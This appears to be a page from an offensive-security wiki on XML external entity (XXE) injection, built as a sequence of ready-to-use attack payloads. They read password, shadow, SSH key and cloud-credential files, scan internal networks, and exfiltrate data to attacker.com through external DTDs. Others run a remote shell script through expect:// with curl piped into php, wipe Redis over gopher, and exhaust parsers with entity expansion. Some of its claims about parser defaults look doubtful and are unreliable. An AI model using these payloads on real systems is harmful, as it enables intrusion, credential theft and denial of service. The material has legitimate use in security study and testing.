XML injection (XXE - XML External Entity)

Before you start, it is very recommended to have basics of XML and XML parsers / Document Type Definitions (DTDs) including external-entity resolution. This part may seem long, and its sections are built to be sequentially starting from the beginner level up to some advanced stuff, feel free to navigate to whatever topic you want. hack fun :)

Understanding XML Injection

What is XXE Injection?

XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser processes external entity references in XML documents without proper validation. This allows attackers to access local files, perform SSRF attacks, cause denial of service, or execute remote code in some cases.

Vulnerable Code Example

// PHP vulnerable XML processing 
$xml_data = $_POST['xml']; 
// Vulnerable: libxml with external entities enabled 
$dom = new DOMDocument(); 
$dom->loadXML($xml_data); 
// External entities processed by default
$xpath = new DOMXPath($dom); 
$result = $xpath->query('//user/name');
echo "User: " . $result->item(0)->nodeValue;

Normal XML Request:

<?xml version="1.0"?>
<user>
    <name>John</name>
    <email>john@example.com</email>
</user>

Malicious XXE Request:

<?xml version="1.0"?>
<!DOCTYPE user [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
    <name>&xxe;</name>
    <email>john@example.com</email>
</user>

How XXE Injection Works

XXE exploits the XML parser's ability to process Document Type Definitions (DTDs) and external entities. When external entity processing is enabled, attackers can define malicious entities that reference local files, network resources, or other XML documents.

XML Entity Types

Internal Entities:

<!DOCTYPE doc [
    <!ENTITY internal "Internal Entity Value">
]>
<doc>&internal;</doc>

External Entities:

<!DOCTYPE doc [
    <!ENTITY external SYSTEM "file:///etc/passwd">
]>
<doc>&external;</doc>

Parameter Entities:

<!DOCTYPE doc [
    <!ENTITY % param "value">
    %param;
]>

General vs Parameter Entities:

General entities: &entityname; - Used in document content
Parameter entities: %entityname; - Used in DTD definitions

Impact and Consequences

Local File Disclosure - Reading sensitive system files
Server-Side Request Forgery (SSRF) - Making requests to internal services
Denial of Service - Billion laughs attack, recursive entity expansion
Remote Code Execution - In specific configurations (expect://, PHP wrappers)
Information Disclosure - Extracting configuration files, source code
Port Scanning - Discovering internal network services

XML Parser Behavior and Detection

Common XML Parsers

PHP Parsers:

DOMDocument - Default: External entities enabled
SimpleXML - Default: External entities disabled (PHP 5.6+)
XMLReader - Default: External entities enabled

Java Parsers:

DocumentBuilderFactory - Default: External entities enabled
SAXParserFactory - Default: External entities enabled
XMLInputFactory (StAX) - Default: External entities enabled
TransformerFactory - Default: External entities enabled

Python Parsers:

xml.etree.ElementTree - Default: External entities disabled
xml.dom.minidom - Default: External entities disabled
lxml - Default: External entities disabled
xml.sax - Default: External entities disabled

JavaScript/Node.js Parsers:

libxmljs - Default: External entities enabled
xmldom - Default: External entities enabled
xml2js - Default: External entities disabled

Detection Methodology

Basic Entity Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY test "XXE_DETECTED">
]>
<root>
    <data>&test;</data>
</root>

File Reading Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
    <data>&xxe;</data>
</root>

HTTP Request Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY xxe SYSTEM "http://attacker.com/xxe_test">
]>
<root>
    <data>&xxe;</data>
</root>

Basic XXE Exploitation Techniques

Local File Disclosure

Direct File Reading

Reading System Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>
    <content>&file;</content>
</data>

Reading Configuration Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY config SYSTEM "file:///etc/apache2/apache2.conf">
]>
<data>
    <content>&config;</content>
</data>

Reading Application Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY app SYSTEM "file:///var/www/html/config.php">
]>
<data>
    <content>&app;</content>
</data>

Windows File System Access

Reading Windows System Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<data>
    <content>&file;</content>
</data>

Reading IIS Configuration:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY iis SYSTEM "file:///C:/inetpub/wwwroot/web.config">
]>
<data>
    <content>&iis;</content>
</data>

Reading Application Data:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY app SYSTEM "file:///C:/Program Files/Application/config.xml">
]>
<data>
    <content>&app;</content>
</data>

Environment-Specific Paths

Common Linux Paths:

<!-- System Information -->
<!ENTITY system SYSTEM "file:///proc/version">
<!ENTITY cpuinfo SYSTEM "file:///proc/cpuinfo">
<!ENTITY meminfo SYSTEM "file:///proc/meminfo">

<!-- Network Configuration -->
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY resolv SYSTEM "file:///etc/resolv.conf">
<!ENTITY network SYSTEM "file:///etc/network/interfaces">

<!-- User Information -->
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY shadow SYSTEM "file:///etc/shadow">
<!ENTITY group SYSTEM "file:///etc/group">

<!-- SSH Configuration -->
<!ENTITY sshd_config SYSTEM "file:///etc/ssh/sshd_config">
<!ENTITY ssh_host_key SYSTEM "file:///etc/ssh/ssh_host_rsa_key">

<!-- Log Files -->
<!ENTITY auth_log SYSTEM "file:///var/log/auth.log">
<!ENTITY syslog SYSTEM "file:///var/log/syslog">
<!ENTITY apache_log SYSTEM "file:///var/log/apache2/access.log">

Common Windows Paths:

<!-- System Information -->
<!ENTITY boot SYSTEM "file:///C:/boot.ini">
<!ENTITY hosts SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

<!-- IIS Configuration -->
<!ENTITY iis_config SYSTEM "file:///C:/inetpub/wwwroot/web.config">
<!ENTITY machine_config SYSTEM "file:///C:/Windows/Microsoft.NET/Framework64/v4.0.30319/Config/machine.config">

<!-- Application Files -->
<!ENTITY app_config SYSTEM "file:///C:/inetpub/wwwroot/App_Data/database.config">
<!ENTITY connection_strings SYSTEM "file:///C:/inetpub/wwwroot/connectionStrings.config">

<!-- User Profiles -->
<!ENTITY user_profile SYSTEM "file:///C:/Users/Administrator/Desktop/passwords.txt">
<!ENTITY documents SYSTEM "file:///C:/Users/Administrator/Documents/sensitive.doc">

Server-Side Request Forgery (SSRF)

Internal Network Scanning

Port Scanning:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ssrf SYSTEM "http://192.168.1.1:80/">
]>
<data>
    <content>&ssrf;</content>
</data>

Service Discovery:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY mysql SYSTEM "http://localhost:3306/">
    <!ENTITY redis SYSTEM "http://localhost:6379/">
    <!ENTITY mongo SYSTEM "http://localhost:27017/">
    <!ENTITY elastic SYSTEM "http://localhost:9200/">
]>
<data>
    <mysql>&mysql;</mysql>
    <redis>&redis;</redis>
    <mongo>&mongo;</mongo>
    <elastic>&elastic;</elastic>
</data>

Internal API Access:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY api SYSTEM "http://internal-api.company.com/admin/users">
]>
<data>
    <content>&api;</content>
</data>

Cloud Metadata Access

AWS Metadata Service:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>
    <content>&aws;</content>
</data>

Google Cloud Metadata:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<data>
    <content>&gcp;</content>
</data>

Azure Metadata Service:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY azure SYSTEM "http://169.254.169.254/metadata/instance/compute/azEnvironment?api-version=2021-02-01">
]>
<data>
    <content>&azure;</content>
</data>

Protocol Exploitation

FTP Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ftp SYSTEM "ftp://internal-ftp.company.com:21/">
]>
<data>
    <content>&ftp;</content>
</data>

LDAP Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ldap SYSTEM "ldap://internal-ldap.company.com:389/dc=company,dc=com">
]>
<data>
    <content>&ldap;</content>
</data>

Gopher Protocol (if supported):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY gopher SYSTEM "gopher://localhost:6379/_*1%0d%0a$4%0d%0ainfo%0d%0a">
]>
<data>
    <content>&gopher;</content>
</data>

Advanced XXE Exploitation

Blind XXE Exploitation

Out-of-Band Data Exfiltration

Basic Out-of-Band XXE:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
    %eval;
    %exfiltrate;
]>
<data>test</data>

Parameter Entity Chaining:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
    %remote;
]>
<data>test</data>

External DTD (evil.dtd on attacker server):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
%eval;
%exfiltrate;

Error-Based Blind XXE

XML Parse Error Exploitation:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
    %eval;
    %error;
]>
<data>test</data>

Invalid URI Error:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://nonexistent.%file;.attacker.com/'>">
    %eval;
    %error;
]>
<data>test</data>

Time-Based Blind XXE

Slow External Resource:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY slow SYSTEM "http://slow-server.attacker.com/delay.php?time=10">
]>
<data>&slow;</data>

Conditional Time Delays:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % condition SYSTEM "file:///etc/passwd">
    <!ENTITY % delay "<!ENTITY &#x25; slow SYSTEM 'http://attacker.com/slow.php?exists=%condition;'>">
    %delay;
    %slow;
]>
<data>test</data>

XXE with Parameter Entities

Complex Parameter Entity Attacks

Nested Parameter Entities:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % param1 "<!ENTITY &#x25; param2 '<!ENTITY &#x26;#x25; param3 SYSTEM &#x22;file:///etc/passwd&#x22;>'>">
    %param1;
    %param2;
    %param3;
]>
<data>&param3;</data>

Parameter Entity with External DTD:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % external SYSTEM "http://attacker.com/external.dtd">
    %external;
    %all;
]>
<data>&send;</data>

External DTD with Data Exfiltration:

<!-- external.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/collect.php?data=%file;'>">

UTF-16 Encoding Bypass

UTF-16BE Encoded XXE:

<?xml version="1.0" encoding="UTF-16BE"?>
<!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

UTF-16LE Encoded XXE:

<?xml version="1.0" encoding="UTF-16LE"?>
<!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

Protocol Handler Exploitation

PHP Wrapper Exploitation

PHP Filter for Base64 Encoding:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<data>&file;</data>

PHP Input Stream:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY input SYSTEM "php://input">
]>
<data>&input;</data>

PHP Expect Wrapper (if enabled):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY cmd SYSTEM "expect://whoami">
]>
<data>&cmd;</data>

Data URI Exploitation

Data URI with Base64:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY b64 SYSTEM "data:text/plain;base64,SGVsbG8gV29ybGQ=">
]>
<data>&b64;</data>

Data URI with URL Encoding:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY encoded SYSTEM "data:text/plain,Hello%20World">
]>
<data>&encoded;</data>

Java-Specific Protocol Handlers

jar:// Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY jar SYSTEM "jar:file:///path/to/archive.jar!/META-INF/MANIFEST.MF">
]>
<data>&jar;</data>

netdoc:// Protocol (Java):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY netdoc SYSTEM "netdoc:///etc/passwd">
]>
<data>&netdoc;</data>

Denial of Service Attacks

Billion Laughs Attack

Exponential Entity Expansion

Classic Billion Laughs:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY lol "lol">
    <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<data>&lol9;</data>

Optimized Expansion Attack:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
    <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
    <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
    <!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
]>
<data>&e;</data>

Quadratic Blowup Attack

Large Entity Repetition: The quadratic blowup attack involves creating a very large entity (thousands of characters) and then referencing it multiple times within the XML document. This causes exponential memory consumption as the parser expands each reference. Create an entity with 10,000+ repetitive characters, then reference it 1,000+ times in the document content.

xml

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY huge "AAAA[...repeat A 10,000 times...]AAAA">
]>
<data>
    &huge;&huge;&huge;[...repeat &huge; 1000+ times...]&huge;
</data>

External Resource Exhaustion

Slow Loris Attack

Slow External Resource Loading:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY slow1 SYSTEM "http://slow-server.attacker.com/delay?time=30">
    <!ENTITY slow2 SYSTEM "http://slow-server.attacker.com/delay?time=30">
    <!ENTITY slow3 SYSTEM "http://slow-server.attacker.com/delay?time=30">
]>
<data>
    &slow1;&slow2;&slow3;
</data>

Multiple Concurrent Requests:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY req1 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req2 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req3 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req4 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req5 SYSTEM "http://target-internal.com/large-resource">
]>
<data>
    &req1;&req2;&req3;&req4;&req5;
</data>

Recursive Entity Loading

Infinite External Entity Loop:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
    %recursive;
]>
<data>test</data>

Recursive DTD (recursive.dtd):

<!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
%recursive;

XXE in Different Application Contexts

Web Services and APIs

SOAP Web Services

SOAP Envelope XXE:

<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <getUserInfo>
            <username>&xxe;</username>
        </getUserInfo>
    </soap:Body>
</soap:Envelope>

WSDL File XXE:

<?xml version="1.0"?>
<!DOCTYPE definitions [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/">
    <documentation>&xxe;</documentation>
</definitions>

REST API with XML Content

XML Payload in REST:

POST /api/users HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE user [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
    <name>&xxe;</name>
    <email>test@example.com</email>
</user>

RSS Feed Processing:

<?xml version="1.0"?>
<!DOCTYPE rss [
    <!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<rss version="2.0">
    <channel>
        <title>News Feed</title>
        <description>&xxe;</description>
    </channel>
</rss>

File Upload and Processing

Document Upload XXE

Microsoft Office Document XXE:

<!-- In document.xml within .docx file -->
<?xml version="1.0"?>
<!DOCTYPE document [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
    <w:body>
        <w:p>
            <w:r>
                <w:t>&xxe;</w:t>
            </w:r>
        </w:p>
    </w:body>
</w:document>

SVG File XXE:

<?xml version="1.0"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
    <text>&xxe;</text>
</svg>

Android APK Manifest XXE:

<?xml version="1.0"?>
<!DOCTYPE manifest [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:label="&xxe;">
    </application>
</manifest>

Configuration File Processing

XML Configuration Files:

<?xml version="1.0"?>
<!DOCTYPE config [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>
    <database>
        <host>&xxe;</host>
        <username>admin</username>
    </database>
</config>

Spring Bean Configuration:

<?xml version="1.0"?>
<!DOCTYPE beans [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<beans xmlns="http://www.springframework.org/schema/beans">
    <bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource">
        <property name="url" value="&xxe;"/>
    </bean>
</beans>

Content Management Systems

WordPress XML-RPC

XML-RPC Method Call:

<?xml version="1.0"?>
<!DOCTYPE methodCall [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<methodCall>
    <methodName>system.listMethods</methodName>
    <params>
        <param>
            <value>
                <string>&xxe;</string>
            </value>
        </param>
    </params>
</methodCall>

Drupal XML Processing

Drupal Feed Import:

<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
    <!ENTITY xxe SYSTEM "file:///var/www/drupal/sites/default/settings.php">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <item>
        <title>&xxe;</title>
    </item>
</rdf:RDF>

XXE in Mobile Applications

Android Application XXE

XML Parsing in Android

Android XML Parser XXE:

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///system/etc/hosts">
]>
<root>
    <data>&xxe;</data>
</root>

Android Layout XML:

<?xml version="1.0"?>
<!DOCTYPE LinearLayout [
    <!ENTITY xxe SYSTEM "file:///data/data/com.app.package/shared_prefs/preferences.xml">
]>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android">
    <TextView android:text="&xxe;" />
</LinearLayout>

iOS Application XXE

iOS Plist Processing:

<?xml version="1.0"?>
<!DOCTYPE plist [
    <!ENTITY xxe SYSTEM "file:///private/var/mobile/Library/Preferences/com.app.plist">
]>
<plist version="1.0">
    <dict>
        <key>data</key>
        <string>&xxe;</string>
    </dict>
</plist>

Advanced Exploitation Scenarios

Multi-Stage XXE Attacks

XXE to RCE Chain

Stage 1: File Discovery

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///etc/crontab">
]>
<data>&file;</data>

Stage 2: Configuration Extraction

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY config SYSTEM "file:///var/www/html/config.php">
]>
<data>&config;</data>

Stage 3: Remote Code Execution (if PHP expect enabled)

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY rce SYSTEM "expect://curl http://attacker.com/shell.php | php">
]>
<data>&rce;</data>

XXE to SSRF to Internal Network Compromise

Stage 1: Internal Network Discovery

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY scan SYSTEM "http://192.168.1.1:22/">
]>
<data>&scan;</data>

Stage 2: Service Enumeration

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY redis SYSTEM "http://192.168.1.100:6379/">
]>
<data>&redis;</data>

Stage 3: Service Exploitation via Gopher

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY exploit SYSTEM "gopher://192.168.1.100:6379/_*1%0d%0a$8%0d%0aFLUSHALL%0d%0a">
]>
<data>&exploit;</data>

PreviousLDAP injection NextTemplate injection (SSTI - Server-Side Template Injection)

Last updated 2 months ago

Was this helpful?

Good afternoon

hashtagUnderstanding XML Injection

hashtagWhat is XXE Injection?

hashtagVulnerable Code Example

hashtagNormal XML Request:

hashtagHow XXE Injection Works

hashtagXML Entity Types

hashtagImpact and Consequences

hashtagXML Parser Behavior and Detection

hashtagCommon XML Parsers

hashtagDetection Methodology

hashtagBasic XXE Exploitation Techniques

hashtagLocal File Disclosure

hashtagDirect File Reading

hashtagWindows File System Access

hashtagEnvironment-Specific Paths

hashtagServer-Side Request Forgery (SSRF)

hashtagInternal Network Scanning

hashtagCloud Metadata Access

hashtagProtocol Exploitation

hashtagAdvanced XXE Exploitation

hashtagBlind XXE Exploitation

hashtagOut-of-Band Data Exfiltration

hashtagError-Based Blind XXE

hashtagTime-Based Blind XXE

hashtagXXE with Parameter Entities

hashtagComplex Parameter Entity Attacks

hashtagUTF-16 Encoding Bypass

hashtagProtocol Handler Exploitation

hashtagPHP Wrapper Exploitation

hashtagData URI Exploitation

hashtagJava-Specific Protocol Handlers

hashtagDenial of Service Attacks

hashtagBillion Laughs Attack

hashtagExponential Entity Expansion

hashtagQuadratic Blowup Attack

hashtagExternal Resource Exhaustion

hashtagSlow Loris Attack

hashtagRecursive Entity Loading

hashtagXXE in Different Application Contexts

hashtagWeb Services and APIs

hashtagSOAP Web Services

hashtagREST API with XML Content

hashtagFile Upload and Processing

hashtagDocument Upload XXE

hashtagConfiguration File Processing

hashtagContent Management Systems

hashtagWordPress XML-RPC

hashtagDrupal XML Processing

hashtagXXE in Mobile Applications

hashtagAndroid Application XXE

hashtagXML Parsing in Android

hashtagiOS Application XXE

hashtagAdvanced Exploitation Scenarios

hashtagMulti-Stage XXE Attacks

hashtagXXE to RCE Chain

hashtagXXE to SSRF to Internal Network Compromise

Understanding XML Injection

What is XXE Injection?

Vulnerable Code Example

Normal XML Request:

How XXE Injection Works

XML Entity Types

Impact and Consequences

XML Parser Behavior and Detection

Common XML Parsers

Detection Methodology

Basic XXE Exploitation Techniques

Local File Disclosure

Direct File Reading

Windows File System Access

Environment-Specific Paths

Server-Side Request Forgery (SSRF)

Internal Network Scanning

Cloud Metadata Access

Protocol Exploitation

Advanced XXE Exploitation

Blind XXE Exploitation

Out-of-Band Data Exfiltration

Error-Based Blind XXE

Time-Based Blind XXE

XXE with Parameter Entities

Complex Parameter Entity Attacks

UTF-16 Encoding Bypass

Protocol Handler Exploitation

PHP Wrapper Exploitation

Data URI Exploitation

Java-Specific Protocol Handlers

Denial of Service Attacks

Billion Laughs Attack

Exponential Entity Expansion

Quadratic Blowup Attack

External Resource Exhaustion

Slow Loris Attack

Recursive Entity Loading

XXE in Different Application Contexts

Web Services and APIs

SOAP Web Services

REST API with XML Content

File Upload and Processing

Document Upload XXE

Configuration File Processing

Content Management Systems

WordPress XML-RPC

Drupal XML Processing

XXE in Mobile Applications

Android Application XXE

XML Parsing in Android

iOS Application XXE

Advanced Exploitation Scenarios

Multi-Stage XXE Attacks

XXE to RCE Chain

XXE to SSRF to Internal Network Compromise